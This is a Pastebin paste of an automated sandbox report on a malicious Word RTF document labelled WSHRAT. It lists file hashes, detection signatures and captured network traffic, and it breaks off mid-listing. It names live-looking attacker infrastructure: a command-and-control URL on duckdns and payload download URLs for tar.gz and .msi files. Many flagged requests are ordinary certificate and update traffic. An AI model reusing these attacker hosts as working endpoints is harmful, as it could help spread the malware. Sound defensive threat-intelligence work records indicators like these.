SHARE
TWEET

Docs_0251b22f858fcc0ced62b34fdbda70c9_doc.json

paladin316 Jun 18th, 2019 78 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. [*] MalFamily: "Wshrat"
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "Docs_0251b22f858fcc0ced62b34fdbda70c9.doc"
  7. [*] File Size: 267436
  8. [*] File Type: "Rich Text Format data, version 1, unknown character set"
  9. [*] SHA256: "bbefd3aa4e17e4e4d8dc212af713f28c101072a37d17894cdc53d589f500c513"
  10. [*] MD5: "0251b22f858fcc0ced62b34fdbda70c9"
  11. [*] SHA1: "1cf6d9af3a06dd37b8e316acc792b284864f49e8"
  12. [*] SHA512: "c56db255e3302d131b943885a5a41b50c21055280c043119922deac1f4defec53885694117c9bcb28e9cb82dcea25d1df4a431b60ff66d560b53381adc2824eb"
  13. [*] CRC32: "C56D2101"
  14. [*] SSDEEP: "768:s7Kf2sdrM3xaSybdRZXZWkWZNLekKXw47vm6KE1ml2OsyoFt/xsY58aMmYhd0PhB:sxxQW3ykpeu6K5sv/T59nyXUq5aWmEO"
  15.  
  16. [*] Process Execution: [
  17.     "WINWORD.EXE"
  18. ]
  19.  
  20. [*] Signatures Detected: [
  21.     {
  22.         "Description": "Attempts to connect to a dead IP:Port (6 unique times)",
  23.         "Details": [
  24.             {
  25.                 "IP": "104.87.15.67:443"
  26.             },
  27.             {
  28.                 "IP": "104.18.24.243:80"
  29.             },
  30.             {
  31.                 "IP": "104.100.17.152:443"
  32.             },
  33.             {
  34.                 "IP": "52.109.92.24:443"
  35.             },
  36.             {
  37.                 "IP": "72.21.91.29:80"
  38.             },
  39.             {
  40.                 "IP": "52.109.12.6:443"
  41.             }
  42.         ]
  43.     },
  44.     {
  45.         "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
  46.         "Details": [
  47.             {
  48.                 "ioc": "turabian.xsl"
  49.             },
  50.             {
  51.                 "ioc": "ontent.inf"
  52.             },
  53.             {
  54.                 "ioc": "iso690.xsl"
  55.             },
  56.             {
  57.                 "ioc": "mlaseventheditionofficeonline.xsl"
  58.             },
  59.             {
  60.                 "ioc": "ist.glox"
  61.             },
  62.             {
  63.                 "ioc": "adial.glox"
  64.             },
  65.             {
  66.                 "ioc": "chicago.xsl"
  67.             },
  68.             {
  69.                 "ioc": "architecture.glox"
  70.             },
  71.             {
  72.                 "ioc": "quations.dotx"
  73.             },
  74.             {
  75.                 "ioc": "iso690nmerical.xsl"
  76.             },
  77.             {
  78.                 "ioc": "gb.xsl"
  79.             },
  80.             {
  81.                 "ioc": "content.inf"
  82.             },
  83.             {
  84.                 "ioc": "rame.thmx"
  85.             },
  86.             {
  87.                 "ioc": "gosttitle.xsl"
  88.             },
  89.             {
  90.                 "ioc": "set.dotx"
  91.             },
  92.             {
  93.                 "ioc": "rocess.glox"
  94.             },
  95.             {
  96.                 "ioc": "chevronaccent.glox"
  97.             },
  98.             {
  99.                 "ioc": "sist02.xsl"
  100.             },
  101.             {
  102.                 "ioc": "pictureorgchart.glox"
  103.             },
  104.             {
  105.                 "ioc": "iew.thmx"
  106.             }
  107.         ]
  108.     },
  109.     {
  110.         "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  111.         "Details": [
  112.             {
  113.                 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  114.             },
  115.             {
  116.                 "suspicious_request": "http://vemvemserver.duckdns.org:1425/is-ready"
  117.             },
  118.             {
  119.                 "suspicious_request": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
  120.             },
  121.             {
  122.                 "suspicious_request": "http://ocsp.comodoca4.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D"
  123.             },
  124.             {
  125.                 "suspicious_request": "http://doughnut-snack.live/bpvpl.tar.gz"
  126.             },
  127.             {
  128.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  129.             },
  130.             {
  131.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  132.             },
  133.             {
  134.                 "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D"
  135.             },
  136.             {
  137.                 "suspicious_request": "http://doughnut-snack.live/mapv.tar.gz"
  138.             },
  139.             {
  140.                 "suspicious_request": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D"
  141.             },
  142.             {
  143.                 "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D"
  144.             },
  145.             {
  146.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  147.             },
  148.             {
  149.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D"
  150.             },
  151.             {
  152.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D"
  153.             },
  154.             {
  155.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D"
  156.             },
  157.             {
  158.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D"
  159.             },
  160.             {
  161.                 "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D"
  162.             },
  163.             {
  164.                 "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D"
  165.             },
  166.             {
  167.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D"
  168.             },
  169.             {
  170.                 "suspicious_request": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D"
  171.             },
  172.             {
  173.                 "suspicious_request": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D"
  174.             },
  175.             {
  176.                 "suspicious_request": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D"
  177.             },
  178.             {
  179.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D"
  180.             },
  181.             {
  182.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D"
  183.             },
  184.             {
  185.                 "suspicious_request": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D"
  186.             },
  187.             {
  188.                 "suspicious_request": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe"
  189.             },
  190.             {
  191.                 "suspicious_request": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes"
  192.             }
  193.         ]
  194.     },
  195.     {
  196.         "Description": "Performs some HTTP requests",
  197.         "Details": [
  198.             {
  199.                 "url": "http://paroquiadamarinhagrande.pt/app/hmvrch.msi"
  200.             },
  201.             {
  202.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D"
  203.             },
  204.             {
  205.                 "url": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D"
  206.             },
  207.             {
  208.                 "url": "http://vemvemserver.duckdns.org:1425/is-ready"
  209.             },
  210.             {
  211.                 "url": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
  212.             },
  213.             {
  214.                 "url": "http://ocsp.comodoca4.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEAui0B3Ly3d26KxlCXrBJUE%3D"
  215.             },
  216.             {
  217.                 "url": "http://doughnut-snack.live/bpvpl.tar.gz"
  218.             },
  219.             {
  220.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  221.             },
  222.             {
  223.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  224.             },
  225.             {
  226.                 "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D"
  227.             },
  228.             {
  229.                 "url": "http://doughnut-snack.live/mapv.tar.gz"
  230.             },
  231.             {
  232.                 "url": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D"
  233.             },
  234.             {
  235.                 "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D"
  236.             },
  237.             {
  238.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  239.             },
  240.             {
  241.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D"
  242.             },
  243.             {
  244.                 "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
  245.             },
  246.             {
  247.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D"
  248.             },
  249.             {
  250.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D"
  251.             },
  252.             {
  253.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D"
  254.             },
  255.             {
  256.                 "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D"
  257.             },
  258.             {
  259.                 "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D"
  260.             },
  261.             {
  262.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D"
  263.             },
  264.             {
  265.                 "url": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D"
  266.             },
  267.             {
  268.                 "url": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D"
  269.             },
  270.             {
  271.                 "url": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D"
  272.             },
  273.             {
  274.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D"
  275.             },
  276.             {
  277.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D"
  278.             },
  279.             {
  280.                 "url": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D"
  281.             },
  282.             {
  283.                 "url": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe"
  284.             },
  285.             {
  286.                 "url": "http://r4---sn-tt1e7n7k.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7k&ms=nvh&mt=1560902783&mv=m&pl=24&shardbypass=yes"
  287.             }
  288.         ]
  289.     },
  290.     {
  291.         "Description": "A document file initiated network communications indicative of a potential exploit or payload download",
  292.         "Details": [
  293.             {
  294.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xbf\\xbf\\x833\\xa7\\xcco8r/\\x19\\xeb\\xb5n\\xcc\\x13u\\xbc\\xc0\\xb1\\x8b\\xc1\\xb8\\x06\\x80\\x9d\\x0ev\\xd1yab~\\xfe5\\xf2\\x04`\\xf2a\\x90\\x02\\x84z\\xb6\\xb3\\x07\\xf6up\\x86\\xd8l\\xa5z\\xff?\\x0b\\xa2\\xb7\\x1da{z\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x90\\x16x\\xd4\\x0cm\\xbc\\xe2\\xf5g\\x996\\xc9\\xcc\\xa9>ll\\x89j\\xf6\\xacr}\\xf7\\xa6\\x81\\x88\\xe8\\x81\\xa5-t\\xec\\xf7o\\xbf\\x82\\xe1$\\xe8\\x1c:z\\xa5\\\\xd5\\x89"
  295.             },
  296.             {
  297.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p]\\xd4\\xf7j\\x19h\\x01e\\xff\\xa1\\xa8\\x85dx!\\xc3\\xfcy<au\\x9b\\xc8\\xc4\\xe6\\x16\\x16\\xa2\\xa0\\xa5\\xf6p\\xba4.0\\xaa\t\t~\\xd5\\xd4[\\x91\\xd6\\xc4n6\\xf7\\x98\\x86\\xc5r\\x8a\\xa6\\x81\\xe3h\\x9e\\xa2x#-\\xd8h,\\xca\\xe0\\xe5bl]\\x07\\x8f\\xde\\xd6\\xacg\\x8a;>\\xe6\\xe0\\x86*>dhz\\xa0o\\xca\\xc6u\\xc4?\\x13\\xa3\\x9ad\\xca\\xc0g\tj\\xdc\\xd9\\x9bn\\x15\\xa5l\\xc4\\x0e!\\xb3d\\xd0m\\xf1\\x91qhf\\xddb\\x9e\\x85\\xf9\\x83\\x16\\xbf\\x91w&\\x9bi\\xca\\xa5\\xc8/\\x05\\xa0\\x9cl\\xe3\\xa54\\xce\\xa8dt/\\xa11o\\xe5\\x99\\xbe\\xe3\\xdb\\xec\\x99 st5x\n_m\\x9f[\\x08[\\xb4h\\x9c\\xd8<\\xbe\\xbdy\\xed\t\\xb3m\\x0f^_\\x9be\\xe0#\\x0fi\\xbac\\xd4}\\x12\\x19\\x83\\xb9\\x93\\xc1\\x86\\xef\\xf0(?b9y3\\x9b4\\xa2w\\x9f\\xc9\\x96\\xd2\\xbd\\x9b\\x0c!\\xa4\\xcd\\xd8\\x96\\xd2\\x98@\\x8e\\xec\\xee\\xa1\\x1d\\xef\\x85\\x17\\x99n3m\\x15\\xec\\xf3mu"
  298.             },
  299.             {
  300.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00~\\x01\\x00\\x00z\\x03\\x01]\t}\n\\xc9\\xce\\x10\\xc8%\\x94\\xe6\\xe9\\x8d\\xfe_\\x840`)\\x1a\\xbadz\\xfa*\\xd4i8\\x9fu\\xa4,\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x009\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00 \\x00\\x1e\\x00\\x00\\x1broaming.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  301.             },
  302.             {
  303.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04hu\\xbc\\xb5j\\xd5bm>\\xedj\\x96\\xe1\\xc43\\xf9\\xd8\\xfa'\\xe4fv\\xfa\\x88#\\x9b\\xa8\\x83\\x80r\\xe8i+\\xb9\\x03\\xd1\\xccom\\x04\\xf4oq\\xc7\\x00\\xec\\xec\\x9b\\xabx7m\\xf6@4\\xcc\\x12ich\\\\x8dzs\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd8'l\\x94\\xd6\\xf2x\\xcf(\\xe8+\\xfc\\xd1`\\x80b\\xba{\\x8c\\xa9@\\xa1g\\xa4\\xf6\\xdd\\xff\\x9d\\xfb\\xc5z\\xa4i\\x80e\\x88\\xbd\\xb7y\\xa3)/\\x88b4\\xf7u\\xff"
  304.             },
  305.             {
  306.                 "http_request": "winword.exe_WSASend_get /mfewtzbnmeswstajbgurdgmcgguabbtbl0v27rvz7lbduom%2fnyb45spuewqu5z1zmijhwmys%2bghunoz7oruetfaceai4elabvpzalrznpjlrv1u%3d http/1.1\r\ncache-control: max-age = 89056\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: fri, 22 mar 2019 18:30:24 gmt\r\nif-"
  307.             },
  308.             {
  309.                 "http_request": "winword.exe_WSASend_get /mfqwujbqme4wtdajbgurdgmcgguabbrpc1vzt9qvn7bzy3iidtbhla4mkqquwiif1tycsck3fd7%2fhijo5ox%2f%2bn0ce3saagyvv14%2fmepdgh0aaaaabk8%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: sat, 23 mar 2019 17:46:18 gmt\r\nif-none-match: \"dd54d75d468"
  310.             },
  311.             {
  312.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00z\\x01\\x00\\x00v\\x03\\x01]\t}\r\\xca]\\x14,\\xfb\\xa2\\x1ew2\\x96\\xd12b\\x85\\x1c\\xec\\x08\\xbd\\xaf\\x04vq\\xa0\\xb5\\xa7m\\xe9\\x99\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x005\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1c\\x00\\x1a\\x00\\x00\\x17odc.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  313.             },
  314.             {
  315.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x86\\xbf|\\xf6\\xef\\xd0b\\x9fy-\\xaad\\x8f\\xdc\\xb0\\xee\\x01\\xb4c\\xfb\\xf3+oq\\xc4\\xd5\\x90\\?3\\x18\\x1f@\\x80\\xac~e=\\xd2\\x1e\\xb6g\\xfd]%\\xd6\\x9cx\\xcf.\\xb0w\\x81 nkp{\\xf0\\x0b*\\xbe4y\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x81jo~\\xaf\\xbe\\x05\\xcd\\x13t\\xcc\\xf2b&\\x83&sy\\x0c~\\xb6\\xa3\\x0b\\x1f\n9g\\x12]j\\x15\\x0e\\xa7*c\\xb9\\xb7\\x13\\x1eqth\"\\x87y\\xb3\\x97)"
  316.             },
  317.             {
  318.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p&o\\xcewbn]0\\x83\\xdc\\xa0/9e\\xfc\\xf4\\x94\\xe2*\\xb1\\x9d$]\rc\\xfb@\\x8d\\xc8\t\\x88\\xb9\\x9d\\xa9\\xa6\\x1c'\\xe6y\\xfc\\xb9\\xe2\\xa4\\xdd\\x1dfk\\xcby\\x83\n\\x1d\\xeb\\xc0\\xdcnt\\xc0,\\xf9q\\x16*\\x8b8\\x02\\x8a\\xd97\\x89\\x1e9_\\xeb\\xc02t\\xec\\xba\\xce\\xc6\\xf7#\\xe6\\xba\\xb6\\x0b\\xfb\\xf3\\x8c\\x87\\xd6y\\xdd!\\xe3\\x11g\\x82\\x1d\\xa4\\x0f\tt\\xce-.>r\\x8a\\xaeg\\xad\\xb5\\x94\\xa4.\\xf9\\xbb\\xc5\\xbf)\\x88\\x99fuu$h\\xc0hec*\\xab\\xe9\\xb4:2\\xa8\\xd9}-\\x1e\\x909\\x9b\\xb9\\x83\\x0e{d\\x1e\\x8c\\x13\\x01^\\x0f\\xa1\\xd1-\\x10\\x1f/\\xbav\\xe6n rr]\\x87\\xd0i\\x95\\x11\\xa7{s:cv\\x9a\\x059*/\\xd9x`\\xc0\\x84l\\x9e\\x8f\\xbaj\\xf0\\xbax\\xb4tg\\xda4\\xf6\\x1c\\xbb \\xe7\\xfc\\xa8y\\xf1\\x07\\x03dj=y\\xbe\n)e(e2\\xc6:3ld?\\xeb\\xd8lyt\\xed\\xa2\\xbd\\xd7\\x16\\xee\\x01'\\x925\\xc2\\xd9"
  319.             },
  320.             {
  321.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01pg\\xd7\\xcb\\x05\\x95u\\x07\\x12\\xb8\\xf7\\x15\\xa5\\x97\\xc1n8\\xd8\\x1e\\xea\\xb9g\\x86/\\xfa\\xe4\\xbc\\xc8zu}a\\x99\\xa0\\xea\\xa6b,mh\\x98\\x1be\\xa9&[x\\xf9\\x8fz\\xc3\\xb3\\xe6\\xa4\\xaa%o\\xf7\\xa8(u\\xc2\\xf5v\\xa9$/\\xae\\xb9\\xb6\\x1e\\x03`\\x84\\x9co\\x9b\\xbbe,\\x88\\xfa\nv\\xbef\\x9a\\x05>\\xf3ta\\xa0[\\xa4okya(\\xd4\\x9d\\x90\\xe9\\xb9*\\xfdk.\\xb9\\xb4kq\\xb8\\xd4\\x96\\xc4\\x89\\xdc\\xc9{\\xa1m6\\x1f\\xba:\\xe3\\x96g\\x89\\x93u\\xc7!\\xe5\ru\\x17\r\\xc4\\xbf\\x18<\"\\xc5\\x92_\\xc0\\xc1\\xae\\x82&-\\x04\\x80\\xcb\\x8adp:\\xdf\\xf80\\xd0g\\x0f\\xccsr\\x98\\xd6\\xea\\x08h\\xf7'2\\xc7\\xc5\\xad\\x9ejf\\x82\\x11\\xf7)\\x8d\\xb1\\xad\\x01~ur\\xbba\\x9f\n\\xd5\\xa8\\xb8o\\x94d\\xba\\xc6hs$\\x88\\x18\\x8b\\xc6\\xfde\\xeb_\\xdc\\xba]lif8\\xb2\\xd2v\\x85\\xe0\\xf1\\xe9\\x123\\xa9{\\x81\\x14\\x0e\\xdd\\xe4\\x1a\\xcedl\\xdd\\x0e]63\\xe5|"
  322.             },
  323.             {
